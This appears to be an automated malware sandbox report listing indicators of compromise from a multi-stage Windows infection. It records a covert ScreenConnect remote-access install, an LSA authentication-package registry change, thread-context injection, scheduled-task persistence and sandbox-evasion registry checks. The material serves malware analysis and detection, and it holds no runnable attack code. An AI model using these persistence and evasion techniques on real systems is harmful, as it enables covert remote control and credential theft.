msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\U: msiexec.exe -
AutoIT Executable 3 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x000c000000023b6d-168.dat autoit_exe behavioral1/files/0x0007000000023d62-474.dat autoit_exe behavioral1/files/0x0007000000023d65-490.dat autoit_exe -
Boot or Logon Autostart Execution: Authentication Package 1 TTPs 1 IoCs
Suspicious Windows Authentication Registry Modification.
description ioc Process Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\Authentication Packages = 6d007300760031005f003000000043003a005c00500072006f006700720061006d002000460069006c00650073002000280078003800360029005c00530063007200650065006e0043006f006e006e00650063007400200043006c00690065006e00740020002800390031006200370064003300370035003100330030006600320039003400610029005c00530063007200650065006e0043006f006e006e006500630074002e00570069006e0064006f0077007300410075007400680065006e007400690063006100740069006f006e005000610063006b006100670065002e0064006c006c0000000000 msiexec.exe -
Drops file in System32 directory 2 IoCs
description ioc Process File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (91b7d375130f294a)\3nq4atj2.tmp ScreenConnect.ClientService.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (91b7d375130f294a)\3nq4atj2.newcfg ScreenConnect.ClientService.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 20 IoCs
pid Process 3744 1Q39x7.exe 3940 skotes.exe 4996 2p7464.exe 3996 3l82Y.exe 4896 skotes.exe 348 MAl7pjE.exe 1628 TempEYMX6CX1U3Q6ADL7IWSKXE6WJQEXTUSY.EXE 4976 5afb3f6749.exe 3728 483d2fa8a0d53818306efeb32d3.exe 728 fe90177534.exe 1232 791fd74b89.exe 6284 TempV5EUHHRTRWOR2ITHWVYLDOI0GDBUEJWL.EXE 6456 skotes.exe 6732 bf14320d81.exe 7000 2ee2d4784c.exe 5640 e8172d6c5e.exe 6600 c52951429a.exe 6136 02a5726205.exe 5592 skotes.exe 1580 MAl7pjE.exe -
Suspicious use of SetThreadContext 9 IoCs
description pid Process procid_target PID 1576 set thread context of 6928 1576 5eb81d9b73.exe 183 PID 6732 set thread context of 5440 6732 bf14320d81.exe 185 PID 7000 set thread context of 6892 7000 2ee2d4784c.exe 189 PID 7156 set thread context of 7160 7156 7aencsM.exe 201 PID 6684 set thread context of 6748 6684 con12312211221.exe 210 PID 6556 set thread context of 2400 6556 Bjkm5hE.exe 216 PID 3724 set thread context of 5476 3724 monthdragon.exe 220 PID 1692 set thread context of 6680 1692 f3Ypd8O.exe 233 PID 1164 set thread context of 2776 1164 alex12112.exe 239 -
resource yara_rule behavioral1/memory/6248-3865-0x00007FFC31CE0000-0x00007FFC31CEB000-memory.dmp upx behavioral1/memory/6248-3864-0x00007FFC30F00000-0x00007FFC30F14000-memory.dmp upx behavioral1/memory/6248-3863-0x00007FFC172B0000-0x00007FFC17337000-memory.dmp upx behavioral1/memory/6248-3862-0x00007FFC17340000-0x00007FFC1740F000-memory.dmp upx behavioral1/memory/6248-3860-0x00007FFC194A0000-0x00007FFC1956D000-memory.dmp upx behavioral1/memory/6248-3850-0x00007FFC17930000-0x00007FFC17F19000-memory.dmp upx behavioral1/memory/6248-3859-0x00007FFC21E10000-0x00007FFC21E43000-memory.dmp upx behavioral1/memory/6248-3858-0x00007FFC34AA0000-0x00007FFC34AAD000-memory.dmp upx behavioral1/memory/6248-3857-0x00007FFC31070000-0x00007FFC310A6000-memory.dmp upx behavioral1/memory/6248-3856-0x00007FFC31450000-0x00007FFC3147D000-memory.dmp upx behavioral1/memory/6248-3855-0x00007FFC31480000-0x00007FFC31499000-memory.dmp upx behavioral1/memory/6248-3854-0x00007FFC38720000-0x00007FFC3872D000-memory.dmp upx behavioral1/memory/6248-3853-0x00007FFC34980000-0x00007FFC34999000-memory.dmp upx behavioral1/memory/6248-3852-0x00007FFC38730000-0x00007FFC3873F000-memory.dmp upx behavioral1/memory/6248-3851-0x00007FFC371B0000-0x00007FFC371D3000-memory.dmp upx behavioral1/files/0x000700000002450e-3925.dat upx -
Drops file in Program Files directory 17 IoCs
description ioc Process File created C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\app.config msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\Client.en-US.resources msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\system.config msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.ClientService.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.WindowsClient.exe msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.WindowsBackstageShell.exe.config msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.WindowsClient.exe.config msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\Client.resources msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.Client.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.Core.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.WindowsCredentialProvider.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.ClientService.exe msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.Windows.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.WindowsAuthenticationPackage.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.WindowsBackstageShell.exe msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.WindowsFileManager.exe msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (91b7d375130f294a)\ScreenConnect.WindowsFileManager.exe.config msiexec.exe -
Drops file in Windows directory 17 IoCs
description ioc Process File opened for modification C:\Windows\Installer\MSI115B.tmp msiexec.exe File created C:\Windows\Installer\e584f82.msi msiexec.exe File opened for modification C:\Windows\Installer\e584f82.msi msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File created C:\Windows\Installer\SourceHash{E7FFB52F-03E7-9BA2-D37A-094243CEF563} msiexec.exe File created C:\Windows\Installer\{E7FFB52F-03E7-9BA2-D37A-094243CEF563}\DefaultIcon msiexec.exe File opened for modification C:\Windows\Installer\{E7FFB52F-03E7-9BA2-D37A-094243CEF563}\DefaultIcon msiexec.exe File created C:\Windows\Tasks\futors.job amnew.exe File opened for modification C:\Windows\Installer\MSI110C.tmp msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File opened for modification C:\Windows\Installer\MSI530D.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI55DD.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI535C.tmp msiexec.exe File created C:\Windows\Installer\wix{E7FFB52F-03E7-9BA2-D37A-094243CEF563}.SchedServiceConfig.rmi MsiExec.exe File created C:\Windows\Tasks\skotes.job 1Q39x7.exe File created C:\Windows\Installer\e584f84.msi msiexec.exe -
Detects Pyinstaller 1 IoCs
resource yara_rule behavioral1/files/0x0007000000024295-3713.dat pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 7 IoCs
pid pid_target Process procid_target 6288 6600 WerFault.exe 190 6708 7156 WerFault.exe 199 6948 6684 WerFault.exe 209 3292 6556 WerFault.exe 215 6108 3724 WerFault.exe 219 7064 1692 WerFault.exe 231 5040 1164 WerFault.exe 237 -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language apisysDirectx.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language con12312211221.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f3Ypd8O.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempEYMX6CX1U3Q6ADL7IWSKXE6WJQEXTUSY.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language futors.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language con12312211221.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f3Ypd8O.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 791fd74b89.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language c52951429a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2p7464.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bf14320d81.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Bjkm5hE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language monthdragon.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MAl7pjE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language b9c266386f87faea130c2cefee2e6f0f7728848a4901dc8a8524eb9080eb8d13.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 5afb3f6749.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language apisysDirectx.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language amnew.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Bjkm5hE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language alex12112.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language alex12112.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language skotes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2ee2d4784c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language a1EoH8b.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1Q39x7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MAl7pjE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 02a5726205.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7aencsM.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sQ3DZPU.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 55c38d1b84.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language monthdragon.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 5eb81d9b73.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language 32d10d4cf6.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage 32d10d4cf6.exe -
Checks SCSI registry key(s) 3 TTPs 5 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vssvc.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 000000000400000079521e240123cf490000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff00000000270101000008000079521e240000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff00000000070001000068090079521e24000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1d79521e24000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff00000000000000000000000079521e2400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe -
Checks processor information in registry 2 TTPs 12 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 c52951429a.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString c52951429a.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 ScreenConnect.WindowsClient.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString ScreenConnect.WindowsClient.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 4972 timeout.exe -
GoLang User-Agent 1 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
description flow ioc HTTP User-Agent header 311 Go-http-client/1.1 -
Kills process with taskkill 5 IoCs
pid Process 1692 taskkill.exe 1380 taskkill.exe 3852 taskkill.exe 3744 taskkill.exe 348 taskkill.exe -
Modifies data under HKEY_USERS 15 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" ScreenConnect.ClientService.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" ScreenConnect.ClientService.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\26\52C64B7E msiexec.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" ScreenConnect.WindowsClient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" ScreenConnect.WindowsClient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ ScreenConnect.ClientService.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" ScreenConnect.ClientService.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ ScreenConnect.WindowsClient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" ScreenConnect.WindowsClient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" ScreenConnect.WindowsClient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" ScreenConnect.ClientService.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\27 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\28 msiexec.exe -
Modifies registry class 38 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-91b7d375130f294a\UseOriginalUrlEncoding = "1" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-677C-F9795D14B5AB}\InprocServer32 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\PackageCode = "F25BFF7E7E302AB93DA7902434EC5F36" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\SourceList msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\SourceList\PackageName = "ScreenConnect.ClientSetup.msi" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\sc-91b7d375130f294a msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-91b7d375130f294a\shell\open\command msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\F25BFF7E7E302AB93DA7902434EC5F36\Full msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\Version = "402849799" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\SourceList\Media msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\sc-91b7d375130f294a\shell\open\command msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-677C-F9795D14B5AB}\InprocServer32\ThreadingModel = "Apartment" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\F25BFF7E7E302AB93DA7902434EC5F36 msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\AuthorizedLUAApp = "0" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\43653DB775C661B7197B3D5731F092A4 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\43653DB775C661B7197B3D5731F092A4\F25BFF7E7E302AB93DA7902434EC5F36 msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\SourceList\Net msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-677C-F9795D14B5AB}\InprocServer32\ = "C:\\Program Files (x86)\\ScreenConnect Client (91b7d375130f294a)\\ScreenConnect.WindowsCredentialProvider.dll" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\ProductName = "ScreenConnect Client (91b7d375130f294a)" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\Language = "1033" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\AdvertiseFlags = "388" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\ProductIcon = "C:\\Windows\\Installer\\{E7FFB52F-03E7-9BA2-D37A-094243CEF563}\\DefaultIcon" msiexec.exe Key created \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings firefox.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-91b7d375130f294a\URL Protocol msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-91b7d375130f294a\shell msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36 msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\InstanceType = "0" msiexec.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\Clients = 3a0000000000 msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-91b7d375130f294a\shell\open msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-91b7d375130f294a\shell\open\command\ = "\"C:\\Program Files (x86)\\ScreenConnect Client (91b7d375130f294a)\\ScreenConnect.WindowsClient.exe\" \"%1\"" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-677C-F9795D14B5AB} msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-91b7d375130f294a msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-677C-F9795D14B5AB}\ = "ScreenConnect Client (91b7d375130f294a) Credential Provider" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\DeploymentFlags = "3" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\24.3.7.9067\\91b7d375130f294a\\" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\Assignment = "1" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\SourceList\Media\1 = ";" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F25BFF7E7E302AB93DA7902434EC5F36\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\24.3.7.9067\\91b7d375130f294a\\" msiexec.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 320 schtasks.exe 1588 schtasks.exe 2260 schtasks.exe 1088 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 1728 apisysDirectx.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
